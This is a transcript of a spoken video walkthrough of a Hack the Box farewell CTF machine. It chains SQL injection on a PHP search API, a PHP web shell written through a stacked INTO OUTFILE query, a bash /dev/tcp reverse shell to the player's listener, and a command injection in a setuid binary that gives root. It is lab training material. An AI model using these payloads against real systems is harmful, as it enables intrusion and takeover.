beginning of September, I actually started a new job after almost 5 years working at Hack the Box. And as a goodbye present, the content team made me a personal CTF, which is just an amazing present. There's 4 challenges in it. And even though you can't play along at home, I hope you can enjoy watching them and getting learning something, as well as maybe getting some of the humor and jabs in them. Um, this video's challenge is a full pwn box from the Weekly Machines team called Antipattern. I was on the team that reviewed submissions for the Weekly Machines for Hack the Box. I think I use the term anti-pattern a lot, just to describe things that like repeatedly show up that we don't really want to showcase on Hack the Box because they're not realistic or not fun, etc. So it does bring a bit of a challenge because it means that all those things are probably in play and I have to explore a lot. But yeah, let's go jump in and take a look at the box. All right, I've got the description up here. It basically says, be ready to send a ton of support requests because this content will be start releasing right after you leave. I think this is because I made a joke before I left that said, every time I see a web server running out of a user home directory, I'm going to contact support to complain. So right away, I have a hint that there's probably a web server running out of a home directory. But yeah, there's user flag and root flag. I've spawned the box here just a few minutes ago, and we'll grab this IP address and get ready to go jump in. All right, I've got the IP address. We're going to start off with an nmap. I don't get to actually talk about how I run nmap very often because I basically like I do this in blog posts. I don't ever do this in videos, but let me get this started and then we'll get. Oops, that's not what I wanted. Let's see. Control U. No, paste. There we go. So we'll get this started and let it run. I like to run nmap in 2 stages. It's not totally necessary, but I like to do a first pass where we just literally are going to run over all ports. The min rate 10,000. That's a very aggressive rate, but it means that I can run all ports. Here we go in 7 seconds, and I just covered all ports. To me, this is just a real quick way to say, give me all the ports. I just want to know what's open. The next thing I'll do then, following on to that, is I'll do nmap p, and I'll type the ports in. I have played with automating this, like do I pass this former output into like a grep that pulls out the ports and creates that line for me. I actually find that typing out the ports forces my mind to go through the ports and do kind of a catalog of what I've collected and what I'm dealing with. So here it's very easy. It's a bit of a pain on these Windows machines that have 22 open ports, but even then it's just like a way to go through and sort of start, okay, I got this open, and just see that and understand it. And then I want to do SCV for scripts and versions, and the same thing again. This can take longer on Windows. It's pretty quick on Linux usually. Let's go back up. So the other thing I've been doing lately on this initial one is VVV. You don't actually see it because it's under my tmux, but I really wish nmap had a way to just show TTLs. That's all I want is TTLs. But basically, I get with the ports, each of these is 63. What that tells me is the default TTL on a packet from Linux is 64, so that tells me I have a Linux box 1 hop away. That's useful to know. It's especially useful if like the web one came back as 62, because that would tell me that probably the web is in a container or something like that, or it's at least routing through something else. If it's Windows, it's going to be 127, same thing. Anyway, now I run it with the scripts, and that's going to give us stuff like this versioning information. Right away, I can say, okay, this is OpenSSH and Nginx. It's actually useful. We can check out oxdf. oxdf.gitlab.io, and I'll go to cheat sheets and OS system enumeration. I love this. I love that I made this. Good job, me. Let's see. So we have OpenSSH 8.91. OpenSSH is the first one. So we are probably dealing with Jammy or Kinetic, and then probably Jammy based on the Nginx version. So we identified the OS there, even though nmap doesn't really do it. I also have the TTL stuff in here as well. So that's cool. We got the OS. If this was really old, we could look for out-of-date stuff. Anyway, here, kind of standard setup. Not much to do with port 22 until we find creds, so we will take a look at 80. I've already opened up Burp Suite, and because I have Foxy Proxy here set up looking for rules that anything that starts with this 10, with my IP address, which I already forgot what it is, we can Alt period to get it back. Anything that starts with that, with 10.129, is going to go through burp. So we can come here. Let's see. Before we go, we do have a redirect here. So we have a did not follow redirect to oxdf.gitlab.htb. I love this. They've made my website. So before we do, I guess we should grab vim etc hosts Let's see, paste you in, and oxdf.gitlab.htb, boom. I have given read-write access to everybody globally to my Etsy host file. I probably should undo that and just get back to sudoing. It's not a big deal, but that's why I can edit that. You might need sudo. And let's come back up here, and we will. We can just put the IP address in, and it will redirect us there. Sweet. My website. The blog posts here. Let's see. We go all the way back to the beginning. We go all. We don't. Oh yeah, we. All the way back to the beginning when my intros were much shorter and I didn't have pictures there. This is cool. So we can start to poke around a little bit. The posts look pretty much like my posts. Hopefully I don't have to go in and like look at each one of them. I guess I should say here, there's a bunch of like Easter eggs here meant to be kind of jokes or making fun of me in fun. And I'm going to go through a bunch of those here because I think they're funny. I want to give a shout out. If you don't like that, like I include timestamps in the description here. You can jump ahead to the next section. I will get back to the technical stuff. This is like a nice satirical intro that, that's my hacker handle. It's hexadecimal, which is just a fancy way of saying I picked a name that makes normal people's eyes glaze over. They are just ribbing me a little bit here. Let's see. It does include. I've collected certifications, look like alphabet soup. My resume, actually, resume here, we'll look at that in a second. I run a blog, really creative name, huh? I was going to go with guy who breaks computers for fun, but the domain was taken. Anyway, if you're looking for a guy who can break into computers, write 12,000 words about it, and still forget where he left his own car keys, you've found him. Some of this stuff is just the standard stuff from my blog. Let's see. Just going down here, there's a couple other things. Okay, so this is kind of funny. This right here looks very similar, except for Control 0. Cody added a little added that when he joined in 2023. Also in 2019, TRX, my bestest friend in the entire world, joined Hack the Box 2 years before me, inspiring me to join the company. You can see Control 0 actually added himself to the chart here. And then they made fun of, they changed all the certification names here to be something funny. I think that's all here. The resume is funny. We should look at it. So potentially a legit security researcher is a funny story. Well, I don't know. There was a tweet I put out one time talking about a scam that I was observing in PayPal, and it got picked up and mentioned on the Cyberwire podcast. And the guest who came on to talk about it, was like talking about it, and they were like, and we don't know anything about this OXDF guy. It could be potentially legitimate security researcher. And I was kind of, anyway, the way they said it was funny, and they've managed to put that on my resume here. I'm sure there's a bunch of other stuff on here. This is all very funny to look through. That somewhere in the US, let's see, a Python snob of the highest order will silently judge and then loudly correct anyone writing insecure code. 6 cents for spotting shell equals true. Let's see. Panelist podcaster, nothing like couldn't help CRX solve a challenge the one time he asked. Had reached number 4 on the Hack the Box leaderboard and never let anyone forget it. I don't think I talk about it that much, but let's see. Python. I like that my languages are Python is more than English. That's pretty great. Let's see. The team's go-to chill guy. Kavi was my favorite, and yes, he absolutely deserves a bigger paycheck. I do love a Greek salad. I think Kavi made this resume. Props to Kavi. Thank you for that. I can prove that also because if we go here and we wget this and we exif tool resume.pdf, Kavi left his author in there. I don't know if that was intentional or not, but he did. So thanks, Kavi. I appreciate the resume. Oops, did not mean to do that. Can I control shift? Can I control shift T? No, that does not work. Okay, we're going back. Let's get it back open. So let's see. Is there anything else on there I need to get? I think that's basically the about me page. Let's see. oxdf.gitlab. And let's see. The cheat sheets page looks basically the same. YouTube is a link to my YouTube. GitLab's a link to my GitLab. We can check out the feed. This is just if you want to subscribe with an RSS feed. This looks fine. Buy me a coffee leads to buy me a coffee. Tags. The tags are gone. This is a page that on my site, I guess we can take a look at it, oscf.gitlab.io. Tags page is huge, and it just is all these tags. Really want to redesign this thing. I took a shot at it, and people complained that it was not mobile friendly. But I use this all the time to look things up. I'm seeing a technology, and I'm like, I know I've done generic, right? Like boom, now I can see where I've done it, and like I use this page anyway. They got rid of my tags, and there's only 2 left. So I don't. It looks very hard coded because like this should be a 2. And if we click on 2 million, this is boxed by TRX and TCG, and they just changed it to a meme. I joined a pen test, and now I'm glorified QA engineer. Did do a lot of like QA kind of stuff. And if we go back, monitors, one of TCG's boxes. Didn't document one. TCG says it's a skill issue on my part. Skill issues account, yeah. Anyway, and then there's a meme. So we seem kind of at a dead end here. Nothing looking obvious. There is a page on my website. This is on the real site too. /search, and I don't showcase this much, but I actually use it. First, so this is not what the real one looks like. I guess we can check that out. The real one is just this. So we got some, please stop removing my guided questions I spent hours creating. Basically, this is from Alex, I believe, and maybe Fo. I reviewed several hundred guided mode question and answer sections over the course of my time at Hack the Box. Either wrote or reviewed, and I was a real stickler for like trying to keep the voice exactly the same, trying to keep the style the same, consistent. And so when people are writing a new one every couple months, I'm sure I was very nitpicky about changing things. It never bothered me. I was never offended by people not following it, but anyway, they were giving me a hard time about that. But back to the search. So this is on my site, but that's not accurate here anymore. I actually almost missed this the first time because I saw this and I was like, oh, they added memes, and I didn't like actually search for anything because I was like, I know how this works. On my site, there's a very large JSON blob that maps words to headings, anchors on the page, and all the search is done locally in JavaScript. But if I search for something here, we do get back. This is very similar to what it looks like on my site. But if we look in Burp, we're going to see that there's a post or a GET request to search_API.php. Damn you people for changing my site to PHP. I hate you. That's awful. PHP. But that's we need to explore this, right? So let's see. We're going to send this over to Repeater, and we're going to send it to make sure it works. And so you can see behind the scenes, it's sending this request, and it's getting back these different page blobs with a large list of words. Yeah, okay. So obviously things just for here, common classic SQL injection. That looks like SQL injection. So what can we do? Let's see. We can start to play with this. I want to see if I can get it working manually. That one way one of my favorite ways to check for SQL injection is to say, okay, so I crashed it, but that doesn't necessarily mean SQL injection. The question is, can I like recreate the query with the injection? So like if I put semicolon space, like we'll do plus that. Can I get it to uncrash? No. Now we can play around with this for a while. If there's any parentheses in there, that can unbalance it. That didn't work. I need to get rid of the semicolon, and boom, here we go. So we have now recreated the query, and the query is working with all this junk in there. I wonder if I put like a bunch of stuff. Do I get an empty one? Yes, I can get back empty. So that is definitely SQL injection. We've modified the query. We could take this opportunity to yeah, we will. Let's go. Well, let's see. Can we do? Let's see. We could do union select one like that. See if we crash. Yeah. Okay. So now we can do -2 crash 3 boom -4. Aha. Okay. So we have union injection here, and you can see the 2 and the 3 are showing up here. Long list of words. So it looks like 2 and 3 are actually used and displayed. Let's go ahead and take this opportunity to jump over to sqlmap, because I could do this manually, but the stuff I want to do now, it just makes sense to do it. So we're going to copy to file. We're going to save this as search.rec for like request. One thing we do have to do, let's go to a new window here. We have to open up, let's see, search. You want to get, when you run sqlmap, you want to have a query that is not an injection here. So we're going to get rid of all of that. And now we have that. And now we can just do sqlmap -r search.request. And we'll go ahead and tell it it's in the queue parameter. And we'll run this and see what it can find. It's trying all the different possibilities here to figure out what kind of injections may be available. This can take a second. Maybe I'll pause the video and come back. Oh, nope, it found it. Okay, so it found that we have MySQL. Do you want to test? Okay, we can go with that. We'll go to here. We're just going to accept the defaults. And we got, let's see what we have. We have time-based blind and union queries available here. Cool, let's take a look. So first thing I always want to do when enumerating things is like list me the databases, and we'll run that. And boom, we've got information schema and machines. Information schema is like the default, so it's not typically very useful at this point. So we'll just change to D machines, and we'll list tables. And all right, so we got headers, machine tags, machines, posts, sections, words. I can dump all these for you, but really, I know from because I've done this already. There's nothing interesting here. They're kind of big. They take a minute. It's just all the words from my site mapped around, so it can do that search functionality you saw on the page. So without interesting data, what else can we look at? Well, we can go to, let's see, like users and see what users are here. AppDB user at localhost. We can look at privileges, and we have the file privilege. And file privilege is good because we can read and write files. So let's try that. We can do file read etc password, and we'll run that. Yes, and let's see. It says it has saved it to here. So I'm going to go ahead and do this. We will copy that to here and cat etc password, and boom, we've read etc password. There's a MySQL user, there's an app user. So we definitely have file read. What else can we try to read? I think the first thing, well, it'd be good to know, like let's read the site source. Is there something vulnerable in search.php? So we will see, where are we? SQLmap, file read. We don't really know. We know it's Nginx. Maybe we'll search etc Nginx sites enabled, and then I always mess this up. It's either 000 default.conf, or I think in Nginx it's just defaults or default.conf. We'll try it. I should just put batch on here. I'm just going to accept the defaults. Let's see. Local file, have the same. I think this is okay. So we can grab you, copy that here, cat the Nginx, and boom, we did get it. Okay. So there's two web servers defined. The first is in var www.html. It's the default, so any server name is going to go there. Interestingly, it's actually set up to run PHP here, and there's an index.php. So we should probably grab that. And then there's this other one, which is, this is my host name. So this index.php probably is doing the redirect that I saw earlier. And then home app. Yep, I told you there's going to be a web server in a user directory. And here's the server name. It's going to try to get files. It's going to, if you try to get /search, it's going to go for search.php. And then any PHP is getting forwarded to the PHP processing, and it's going to block any htaccess files or ht files. Interesting. Okay, so what if we go here and let's do var www.html index.php and no data received. Oh, because I just misspelled var. Try that again. I really got to add a batch. I will copy that here, cat var. And as we suspected, it's just doing the redirect here, and that's it. Okay, let's see. What if we go up here? Let's do home app index. Let's do search.php. And let's see, no data received. So that failed. We're not able to read in this directory. We can try. Let's see what else we can try. Do the search API one. More importantly, I want to do like SSH. ID RSA. I assume this was definitely going to be the solution, because this is something that we see. We used to publish years ago on Hack the Box as like, oh, web server file read, get SSH key, but like it's super unrealistic. You're not going to have web servers, web processes running as a user that also has a home directory with an SSH key. It just doesn't. You're not going to find that. It's an anti-pattern. But I can't read it here. Either there's no key there, or I can't read in the app directory. We can try see like, oh, what about like bash rc, like some of these files that are typically world readable. Let's see, ls-la chrome.bash-rc. Typically, these files are readable by everybody. So yeah, if I can read in this directory, I should be able to get to it. I can't. So I probably can't get into the app directory. I mean, it's the app directory. The web server's probably running as app, but I'm running as the MySQL user. So I just might not be able to get there. We are interested though in the var www directory because we were able to read there. And so the next thing to try is like, can we write there? And so let's see, we change this to file write. Oh, we need to create a file first. So we will vim test.txt test, and we will dash file write test.txt, and file dest is going to be var www html test.txt. We can write this, and so it's saying it's writing it. It might expect some junk characters. I don't care about that. Do you want a confirmation that it's there? Yep, let's do that. So now it's basically just trying to read it, and it's not. Let's see. Do you want? Yeah, sure. Why? I don't know why it's using time based, but it is. But it basically is failing. It's not fine. It's not able to. It's not writing. And we can come back here. Well, so we're failing to write. Like, so sqlmap is failed. Like what can maybe we should go back to first principles and try to do it ourselves. So we'll come back here and let's see if we can get the file read and file write working on our own. Let's say we got this one. We've already got this union select. We know 2 shows up here, so we can just do a load file. Let's see, password. Not that we need it again, but we know it works, so we'll try that. And boom, that is working. So our read file is pretty easy. We're just using our union injection to put it into this spot right here, and we can read files. Let's go over here to repeater. And in theory, what I should be able to do is also do like, let's see, we put, I mean, we can put this back to a 2. And here we should be able to put like plus into out file, and then it's a space again, and we do the var www html test.txt like that. And in theory, that should work. Now it fails, and if we try to go read from here, var www html test.txt like that, it's null. There's nothing there. So it didn't work. And I actually got stuck here for a little while. I actually had to get a little hint, and the hint was, and I called this out earlier, but the hint was like, look at stacked queries, which is weird because I don't expect MySQL to have stacked queries, but we can try that here. So we can, let's keep some of this. So we will pull in here and then just select, we don't need 1, 2, 3, 4. We can do testing 1, 2, 3. So we're going to select testing 1, 2, 3 into out file var test.txt. So if we send that, we don't fail. We get back a result. And so that's actually this query executing plus this query executing. And we can come back here and read from, and there is our testing 1, 2, 3. So we were able to write. We just needed to use stacked query. So let's go back here and we can write ourselves. Let's see, we will do boom, boom, PHP system, the underscore request, and we'll do some of that, CMD, that, and plus saying bang, and then we need to URL encode all this. So we will select it and Control U, and we are going to write this into oxdf.php and send. We go over here, we can try to read oxdf.php, and that looks Webshell-y to me. So we can try curl. We need to. So if I try to access the index.php on the main site, it's going to send that redirect, right? So we saw that. We can do -i http. I lost my IP address. Let's see. Grab you like that. and you can see there's a redirect sent. If we try slash something else, we're going to get a 404. It's not redirecting because it's only the index that's doing the redirect. This is not a good, this is an anti-pattern. This is not a good way to do it. But so that means if we just try to go straight to our oxdf.php, we crash. If we put cmd equals id, and we don't want a head request, we want a get request. We got nothing. That was not what I expected. Did I butcher this? Oh, like that. ID. Do we look? PHP system request cmd. Did I make some mistake there? cmd equals ID. That's weird. Internal servers error. System. Oh no, I'm missing that. That is just wrong. All right, try this again. I'll come back here. This is system on request. This is not. That is square brackets, and that is square brackets. And that is going to be much better. I don't think we can overwrite files with this. Yeah, it fails. So we'll just put it into XDF2. If we come get here and we get XDF2, classic failing to make a web shell. All right, so now come here and go to oxdf2. We can get rid of the v, but you can see we are running. We were running. We can do data URL encode. I think it's like that. Nope. Data URL encode one word. There we go. And now we can put bash -c bash -I bang bang dev tcp. What's our address? 10 10 14 25 443. That looks good. And we do 0 into 1. I think we're gonna have to manually encode these ats, but let's try that just to be sure. So we can do netcat -lvnt 443 and run that. Yeah, we need to do this. Needs to be %26 because otherwise it thinks it's ending this command equals and starting a new one. So we just need to do that here and %26. And what else do we mess up? Bash -c, bash -I -gcp. What? Weird. Okay, let's try it over here. Let's go to repeater. We're going to change this to something else. And we're going to change this to oxdf2.php question mark cmd equals id. Is that going to work? Helps if I make my question. That looks good. Okay, so we can come here and do bash -c, bash -I, percent, arrow, %26, dev, tcp, 10 10 14 25. I hope that's my IP. 443, and 0 into %26 1. Oh, was I missing the 1? No, I wasn't. Okay. And we need to close that parenthesis and send, and we get a shell. I don't know why it wasn't from bash. Let's not worry about it. I'm good here. I'm going to do my shell upgrade. Dev null -c bash. I've got a whole video on this. I'll put a link to it. I've got a video on the bash reverse shell too. I should put a link to that as well. But we do that, then we control Z, stty, raw -echo. I can't spell raw. Raw -echo, foreground, reset, screen, and we have a shell. Sweet. I think let's go. I bet. Who are we? Let's see. ID I'm app. So if I go cd home, there's user.text. This is too hard for an easy machine. I agree. That's another anti-pattern. Excellent call. So that's there. We can go into app, check it out. But there's nothing interesting here. We could look at search. We could look at search API. But maybe we'll come back and look at search API to see the like a beyond route, looking at the SQL injection. But for now, let's move forward. Sudo. No, because we don't have a password. We can, let's look at the root file system here. Anything in opt? No. Let's do our find. I know a lot of people like to use linps. I never like using linps. I like to just, there's only a handful of things to look for. Like, the next thing, if I can't find anything else, I'll go look for it. But like, let's look at perm 4000 on maybe dash s, and we will 2 into no. And it's just for me, like I will use lim piece bump stuff, but I like to just know, kind of have my checklist of things to go through. So we'll run this. Maybe I'll make this a little bigger. Yeah, that's nice. And something jumps out to me right away. More clicks. That is not most of these things are kind of default that you recognize on any Ubuntu system. Did we cat lsb release? We did correctly predict it was 22204. But more clicks is not one of those. In fact, a big project I worked on at Hackbox was called Less Clicks, trying to automate a bunch of things that were very click heavy and that required users to do a lot of things, and I just automated them and I created the project called Less Clicks. So clearly that's going to be our solution. It's brute, it's SQLI. If we run more clicks, page, we're going to page some stuff. I'm just going to start jamming stuff in here. This has got to be public or private. I just enter three. Another anti-pattern is a compiled binary. Well, I guess this could be a shell script. I'll check. An anti-pattern is a compiled binary that's not that, like, no one would ever create a binary for. Like, no legit user is going to create a ELF executable, maybe not even a shell script like running as SQLI that does this. Like, it just doesn't. It's not realistic, and we get it all the time with people like wanting to showcase reverse engineering and pwn stuff, but then like showcasing it in a way that is just not realistic. I don't even know why we're hanging here. Is it trying to contact the page I just went to? That's awful. Okay, let's get out of here. Let's complications for this. I can't even kill it. Ooh, it's brutal. Kill one, just make sure that's gone. Okay, it's segfaulted. Let's do our file on user bin more clicks. It is a ELF SQLI executable. So that is going to be something we're going to want to reverse engineer. I'm going to go ahead and get a copy of this binary. So let's see. Netcat minus lvmp 5555 into more clicks. That, and we can cat that. And if you don't know, alt period, amazing. It just says, give me the the thing on the previous line at the end, the last argument, just put it in there again. And you can do it multiple times. You can kind of skip through all these things, but super awesome. Into netcat 10, 10, 14, 25, 5555. I don't know why. This is gonna hang open. So I just need to give it enough time that I'm confident it works. And it's always good to MD5 sum, more clicks, and MD5 sum. Ooh, my caps lock came on. More clicks, and they are the same. We got the full thing. So I will open up Ghidra. And close this. We will get a new, oops, nope, don't want that. Cancel. Get a new project. Next. All right. See, we're gonna go into here. Rainbow, nice. Box. Let's see. We'll come anti-pattern. We're gonna make a thing. I'm gonna call Ghidra. Make that the project directory. More clicks is the project name. We need to import a binary. Coming here, we're gonna go up and anti-pattern. More clicks. We're gonna pull it in. We're importing it. We're looking at it. We just double click here. We accept the defaults. We're gonna need to analyze it. This will take a second. We run it. That's pretty quick, I think, because I think this is a relatively short binary. So it's already done down here. You can see. So we'll go to the functions. Let's check out main. There's a bunch of stuff here. So they're creating a ton of stack variables. A bunch of them are like 1024 or 512. So what are we doing here? There's a bunch of stuff. So prompt, it's calling, well, I don't know, it's doing some initialization stuff up here, making sure it runs as set UID. And then we are going to I don't know exactly what this is doing, but there's page prompting for page title. Let's check out prompt and see what it does. So it's going to print f rename variable prompt. It's going to flush standard out. It's going to then read into rename variable input buffer from, what are you going to be? What's parameter 3? Go back and see what it looks like. Oh, it's a size. Okay. I could have just looked up fgets, and that's, so this will be rename variable read size. Cool, and it's going to read from standard in and save it here. It's going to set the last, if it's nothing, if it read nothing, it's going to make sure that there's no string overflow, and then it's going to make sure to set the last character there, again making sure there's no string overflow, and then it returns. Presumably it returns, oh no, it's just set the buffer, so yeah, returns nothing. So basically the prompt function here says read into this buffer. So this, we can rename this variable page title. We can do this all the way through, but you can see it's just doing tons of stuff. Here's the little loop where like it makes sure it's public or private. So then it's going to do this do loop until it gets one that is public or private, and then it's going to break somewhere around here. Yeah, well equals 0. We're reading in a bunch more stuff. What do we do with this stuff at the end here? Yeses or nos is where it's reading in yeses or nos. More string comparison, this is where it has to start with a URL. Does it then? Let's see. Probably I might have broken it by not having anything after that. Anyway, we'll see. Okay, so we'll come down here with all this stuff. It looks like we then take these things and start saving them into other variables. I don't know why. But this right here is interesting. Already, like this jumps out right away. System, it's calling, whoops, didn't mean to double click there. So system on this, let's say we'll call this, rename this variable command string. And the command string is set by this right here. It's going to build that off of grep minus rf, the thing we put in, and this one right here. What is this? Rename command input, I'm going to call it. We just got to trace this back. It looks like it's doing a while loop here, and while it's not the end of it, it's going to copy. Oh, this is basically double escaping things. Command input of, like, this looks like a IDX, we'll call it. So there's like a second X index. We'll just rename this IDX2. This certainly looks like an I in a for loop. So we're going to loop over this local variable and basically set command input equal to I and then IDX2. Oh, okay. So we're putting multiples in here. So I think basically I bet this is not even right. I bet this is actually an array that's setting up all these things and it's putting them all into this. And then it's looping over all. This is probably all one thing. Let's see. We can probably go to the top. Oop. I have a thing that's a 4. Yeah. So I bet if we change, I bet we could spend some time and get this changed to like whatever the total number is. And then all this would reflect is like basically filling up this one variable that we then loop over and grep home app.app for some stuff. This is an anti-pattern because it makes no sense. There's no reason anyone would ever do this in reality. I don't really care. I just know that each of my things can be put in here, and this looks like an easy command injection, right? So we want to put a close quote command and then maybe a comment. So let's try that. I think we have enough to come back here and try this in our shell. If we do more clicks, close our quote, end it. In fact, let's do to dev 2 into, where we standard out? Yeah, let's do 2 into 1, and then we go to dev null, and then end that, and then we're going to do bash. I mean, that might just work for us. And we comment, and then we'll put a comment there. And now let's go through all the rest of this. Private, probably automate this, but I don't think it matters. These don't even matter. Those don't matter. HTTPS. Let's see. Let's do localhost. That still hangs. Dang. It's really. I wonder what it's hanging for. Where are we hanging? Right when we put in the HTTP, we got through the yeses. Whoa, we got something here. It did not work. Okay, let's try this again. I'm gonna run this. Okay, let's look real closely here. first we have this grep. I think one of the problems was that we didn't finish the grep. So if we do close quote, now I need to give it something to grep. So I'm gonna do something small. Before I was doing like a big thing, so I'm gonna do dev shm because there should be nothing there. And then I can end this and I can just run bash. And then I can just put a comment to get the rest of the line. So this is gonna look like grep minus rf dev shm. Oh, sorry, nothing. The empty string from dev shm, which should be nothing. And then I'm gonna run bash. So let's try that. If I just now I'm gonna private. None of these things actually matter. We'll just bang through them real quick. HTTP, boom, and there we got a root shell, and it worked. Awesome. So let's see. We can go to cd root cat root.text, and we did it. This was too easy for an easy machine. I agree with that too. So anti-pattern, another anti-pattern is like the difficulty of the user and the difficulty of the root just don't match up at all. That makes for not as good a box. So, sorry for the rough cut, but I forgot there's a couple beyond root things I wanted to do. So let's go ahead and do that now. Clear export term equals x term. Let's try that. Export term equals x term. Does that work? Clear. Sweet. Okay. So first, we're going to look at the home app SQL. What was it? What was this thing called? Search. Nope. Vim search API. Cool. So we're going to look at the SQL injection, and we'll come down here. And one of the questions I had was like, why? What is it doing? So we get positive and negative. Negative is nothing. I don't know. This this is kind of jank, but whatever. It's going to take this positive thing and it's going to loop over them. So in theory, I could pass an array in, but it doesn't seem to work. But anyway, it's going to loop over and it's going to add these exists clauses here. And then it's going to it's going to basically just make all of those things with ands between them. And then it's going to take this query, where here's our where statement where we're injecting. And then it's going to pass this to MySQL/multi-query. And that is where the stacked queries come from. Because typically MySQL doesn't do stacked queries, but if you run it with multi-query, that's going to say, give me stacked queries. I think we can look this up. PHP multi-query. Let's try that. Yeah, so here we go. Performs one or more queries on the database. And this is vulnerable to SQL injection. So yeah, there we go. So that's why that's what we did there and how we got a stacked query in there. Our terminal's a little bit weird. Let's see. STTY minus A. What am I looking at? Try it again. 29 rows, 110 columns. STTY rows, 29 col 110. Big. There we go. All right. So that was the SQL injection. The other thing I want to look at, which I thought is actually really interesting, and it's a cool little callback. If I go to, let's see, var www, this is where I wrote, right? So if we do an ls minus l, this directory, HTML, is owned by root, group root. It is only writable by root. So how did MySQL write here? And this is actually a throwback to the cobblestone box, which got unintended because of this exact flaw. If we do MariaDB -- version, we're going to see this is version 10.11.11. And this version happens to have a issue where it runs with capabilities. Let's go check this out. We go into cd etc systemd system multi-user target wants, and then we do vim MariaDB service. Okay, here's the service file. This big service file that represents how it starts. And if we search for cap, so right here, ambient capabilities. The capabilities assigned to this service are cap IPC lock. I'm not exactly sure what that does. Cap audit write allows it to write log files. Cap DAC override. Cap DAC overrides to allow the PAM tool. Like this is, and you can. There's a whole bunch of documentation on how this was a terrible idea, but basically we gave it cap DAC override. And cap DAC override says I get to write files and read files as root. Full stop. And so we got to write var www and HTML into a root-only directory because of this capability assigned here. And this is not something that like Hack the Box added. This is not an anti-pattern. This is actually something that came out of the tool MariaDB. This service file is written there. In fact, if we come here and do an ls minus l, whoa, what did I just do? Reset. Can I get this back? Cool. ls minus l. We will see. Where's the MariaDB one? Right here. This is actually pointing into libsystemd system. It's like I'm going over to like this is not something there. This is managed by the package. Another thing to check out though. So the next question is like, why couldn't I write to root? I didn't actually show it in the video, but I couldn't write a root SSH key. I couldn't even read into the home directory. And why is that? And that is because of protect. Let's do it this way. Let's cat that into grep protect. Man, my terminal is junked up. Cat MariaDB into grep -I protect. So protect home is set to true. And that basically says, don't allow this to write into home directories. And so /app is protected because of that, /root is protected, /home app was protected, /root was protected because it's a home directory. So that's that. We can also see this if we do system analyze security MariaDB like that. This will actually show us. It's a little bit janky here, but like we can see the protections that are in place here. So protect mounts is on. Here protect system is not set. I think that would actually have protected Etsy, which we didn't try. Let's see anything else here that I think we should have seen protect home in here somewhere. Well, I don't see it at the moment. Protect home. Oh yeah, there it is right there. So that's just a neater way to see that. But it's not very happy with this as it is. So that's going to be the docs. This is one of my longest videos I've ever made. Major respect to Ipsec, who does this every week. It's not trivial. And really, thank you so much to the content team, and in this case, the Boxaholics team. This was a lot of fun, and I appreciate you guys. I miss you guys. Yeah, we'll keep in touch. I'll be back for another one. Thanks. Bye.